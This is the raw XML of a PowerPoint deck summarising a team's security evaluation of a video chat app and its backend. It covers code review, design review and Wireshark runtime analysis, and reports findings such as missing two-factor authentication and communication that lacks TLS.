              <a:t>- open source vulnerability check =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Snyk</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1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013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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1919416" y="2266633"/>
            <a:ext cx="8451388" cy="14772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Security evaluation techniques</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="45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4500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conducted in phase2 </a:t>
            </a:r>
            <a:endParaRPr sz="4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493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Code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eview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292722" y="962796"/>
            <a:ext cx="1040130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Conducted review activity on the source code implemented by Team2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" latinLnBrk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Focused on finding hardcoded information with specific keyword (key, encrypt, …) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" latinLnBrk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Tried to find vulnerable point from encryption logic</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="16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5752" y="2098100"/>
            <a:ext cx="8093639" cy="2911958"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="dk2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52944" y="3386046"/>
            <a:ext cx="9324975" cy="3248025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3336670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670112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 smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Design </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>R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eview</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR"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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67" name="TextBox 66"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="365444" y="951924"/>
            <a:ext cx="1122513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Reviewed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>system design </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>document given by Team2 and tried to find vulnerable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>design and scenario</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" latinLnBrk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Double checked the design by run time analysis (Two factor authentication, System design for backend server)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="68" name="그림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5911" y="1874352"/>
            <a:ext cx="4075587" cy="230481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9" name="그림 6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7924" y="1874352"/>
            <a:ext cx="3071402" cy="468614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폭발 2 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5853540" y="3835839"/>
            <a:ext cx="6181144" cy="2530373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When registering new user or administrator login, the system doesn't require 2 factor authentication</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="942904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6701122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 smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Runtime 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Analysis</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1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>
          <a:xfrm>
            <a:off x="9448800" y="6492875"/>
            <a:ext cx="2743200" cy="365125"/>
          </a:xfrm>
        </p:spPr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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Google Shape;390;p35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="490558" y="1853473"/>
            <a:ext cx="1356300" cy="115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/>
              <a:t>VideoChat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> app</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Google Shape;390;p35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4333007" y="2733718"/>
            <a:ext cx="1356300" cy="115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smtClean="0"/>
              <a:t>Backend Server</a:t>
            </a:r>
            <a:endParaRPr sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Google Shape;390;p35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7881850" y="1853473"/>
            <a:ext cx="1356300" cy="115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/>
              <a:t>VideoChat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> app</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Google Shape;5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4902687" y="2032543"/>
            <a:ext cx="259602" cy="2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oogle Shape;4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88632" y="1929753"/>
            <a:ext cx="420399" cy="42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" name="직선 화살표 연결선 13"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="9" idx="6"/>
            <a:endCxn id="10" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1846858" y="2429323"/>
            <a:ext cx="3164299" cy="304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>
            <a:stCxn id="9" idx="6"/>
            <a:endCxn id="11" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1846858" y="2429323"/>
            <a:ext cx="6034992" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="9525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10" idx="0"/>
            <a:endCxn id="11" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5011157" y="2429323"/>
            <a:ext cx="2870693" cy="304395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7" name="그림 1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67182" y="3231631"/>
            <a:ext cx="731650" cy="558181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16186" y="1606263"/>
            <a:ext cx="731650" cy="558181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56192" y="1601408"/>
            <a:ext cx="731650" cy="558181"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Google Shape;5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853579" y="2730366"/>
            <a:ext cx="259602" cy="2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" name="Google Shape;4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39524" y="2627576"/>
            <a:ext cx="420399" cy="4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22" name="Google Shape;5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557950" y="2781759"/>
            <a:ext cx="259602" cy="2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3" name="Google Shape;4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43895" y="2678969"/>
            <a:ext cx="420399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TextBox 34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="219831" y="954852"/>
            <a:ext cx="112251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1"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Runtime analysis was mainly focused on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>checking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>secure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>communication and server authentication using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>WireShark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t> tool</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="그림 3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5062" y="3954919"/>
            <a:ext cx="7480295" cy="2672499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="폭발 2 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5878120" y="3984160"/>
            <a:ext cx="6181144" cy="2530373"/>
          </a:xfrm>
          <a:prstGeom prst="irregularSeal2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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Communication between the applications was not secured. TLS needs to be applied</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="36" name="그림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42941" y="3231631"/>
            <a:ext cx="995741" cy="993100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="3" name="직선 화살표 연결선 2"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5782962" y="2429323"/>
            <a:ext cx="95158" cy="152559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986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1905</TotalTime>
  <Words>1086</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>와이드스크린</PresentationFormat>
  <Paragraphs>268</Paragraphs>
  <Slides>29</Slides>
  <Notes>29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5" baseType="lpstr">
      <vt:lpstr>Malgun Gothic</vt:lpstr>
      <vt:lpstr>Malgun Gothic</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Times New Roman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하종오/책임연구원/Cyber Security Management Unit(jongoh.ha@lge.com)</dc:creator>
  <cp:lastModifiedBy>하종오/책임연구원/Security Unit(jongoh.ha@lge.com)</cp:lastModifiedBy>
  <cp:revision>168</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-07-06T23:52:02Z</dcterms:modified>
</cp:coreProperties>
</file>